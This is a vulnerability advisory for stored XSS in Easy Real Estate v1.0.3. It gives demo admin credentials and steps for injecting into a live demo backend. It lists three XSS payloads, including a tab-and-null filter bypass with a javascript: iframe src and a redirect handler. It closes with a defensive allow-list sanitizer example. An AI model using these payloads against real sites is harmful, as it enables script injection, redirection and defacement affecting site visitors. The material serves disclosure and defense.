[*] :: Title: Easy Real Estate v1.0.3 Stored XSS Injection
[*] :: Author: QUIXSS
[*] :: Date: 2019-04-30
[*] :: Software: Easy Real Estate v1.0.3
[?] :: Technical Details & Description:
# Weak input filtering has been discovered in the «Easy Real Estate» web application: data submitted through several input fields of the admin backend is stored and later rendered without proper sanitization, which allows stored cross-site scripting (XSS). The current version at the time of writing is 1.0.3.
[?] :: Demo Website:
# https://codecanyon.net/item/easy-real-estate-/8249131
# Frontend: http://lrandomdev.com/demo/realestates
# Backend: http://lrandomdev.com/demo/realestates/admin/dashboard
# Login/Password (admin): admin/admin
[!] :: Special Note:
# After injecting a payload you will notice that some blocks on the edited page are broken; this is down to the generally poor quality of the code, not to the payload itself.
# It is possible to inject the same <iframe> into the target page twice, probably because the XSS filter does not work properly.
[!] :: For developers:
# Disabling data changes on a demo website does not make your application any more secure. It may be good for business and sales, but you are simply double-crossing your clients.
[+] :: PoC [Links]:
# http://lrandomdev.com/demo/realestates/
# http://lrandomdev.com/demo/realestates/properties/detail/57/
# http://lrandomdev.com/demo/realestates/properties/detail/39/HvfhhzQUIXSS
[+] :: PoC [Stored XSS Injection]:
# Open the demo backend http://lrandomdev.com/demo/realestates/admin/dashboard and log in as admin. Then, for example, go to http://lrandomdev.com/demo/realestates/admin/pages/edit?id=4 and inject your payload into the «Content» text area (switch the WYSIWYG editor to its «HTML» view to edit the raw markup). Save the page and the payload is stored and rendered on the frontend. You can also embed any <iframe> you like, e.g. <iframe src="http://defcon.su" width="1200" height="900"></iframe>.
# The XSS filter is just as easy to bypass on other pages, e.g. http://lrandomdev.com/demo/realestates/admin/amenities: put a payload like sample #3 into the «Name» text field, save the data and check the result. Note that sample #3 contains literal tab characters inside the src attribute value and %00 sequences around the attribute; copy it byte for byte.
# Sample payload #1: <div onmouseover='alert(`QUIXSS`)'>
# Sample payload #2: <img src='https://i.imgur.com/zRm8R9z.gif' onmouseover='window.location.replace(`https://twitter.com/quixss`);'>
# Sample payload #3: "><iframe %00 src="	javascript:prompt(1)	"%00>
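# The following is an added example, not code from this advisory or from the Easy Real Estate code base. It models why a prefix/blacklist check on URL attributes lets sample #3 through (a browser strips the leading tab and the tabs/newlines inside a URL before it reads the scheme), and what an allow-list check that normalizes the value the same way first looks like. It also shows a per-tag attribute allow-list that drops the on* handlers of samples #1 and #2 and the <iframe> element outright. All function names (naiveIsBlocked, browserNormalizeUrl, isSafeUrlAttribute, isAllowedAttribute) and the allow-list contents are hypothetical.

```javascript
// Added example (not the advisory's or the vendor's code): a naive URL
// attribute filter beside a normalizing allow-list check. Everything here
// is a hypothetical model of the problem described in the advisory.

// The src value of sample payload #3, with its literal tab bytes written
// out. The "%00" sequences in the payload sit outside the attribute value.
const PAYLOAD_3_SRC = "\tjavascript:prompt(1)\t";

// Naive filter: block a URL attribute only if it starts with "javascript:".
// A leading tab, space, newline or NUL is enough to slip past it.
function naiveIsBlocked(value) {
  return value.toLowerCase().startsWith("javascript:");
}

// What a browser does to a URL before looking at its scheme, following the
// WHATWG URL parser: strip leading and trailing C0 controls and spaces,
// then delete every ASCII tab, LF and CR wherever it appears.
function browserNormalizeUrl(value) {
  return value
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
}

// Scheme of an already normalized URL, or null for a relative URL.
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(url);
  return m ? m[1].toLowerCase() : null;
}

const ALLOWED_SCHEMES = new Set(["http", "https", "mailto"]);

// Hardened URL check: normalize the way the browser will, then allow-list
// the scheme instead of blacklisting "javascript:".
function isSafeUrlAttribute(value) {
  const scheme = schemeOf(browserNormalizeUrl(value));
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Per-tag attribute allow-list for user-supplied HTML (hypothetical set).
// Anything not listed is dropped: every on* handler, style, and any tag
// that is not a key here, <iframe> included.
const ALLOWED_ATTRS = {
  a: { href: isSafeUrlAttribute, title: () => true },
  img: { src: isSafeUrlAttribute, alt: () => true,
         width: () => true, height: () => true },
  p: {}, div: {}, span: {}, b: {}, i: {}, ul: {}, ol: {}, li: {}, br: {},
};

// Decide whether a single attribute survives sanitization.
function isAllowedAttribute(tag, name, value) {
  const attrs = ALLOWED_ATTRS[tag.toLowerCase()];
  if (!attrs) return false; // the tag itself is not allowed
  const check = attrs[name.toLowerCase()];
  return typeof check === "function" && check(value);
}
```

# The point of normalizing before checking is that the filter must see the URL the way the browser will, not the way it was typed; a filter that only strips or matches "<iframe" and "javascript:" as literal substrings is checking a different string than the one that ends up executing.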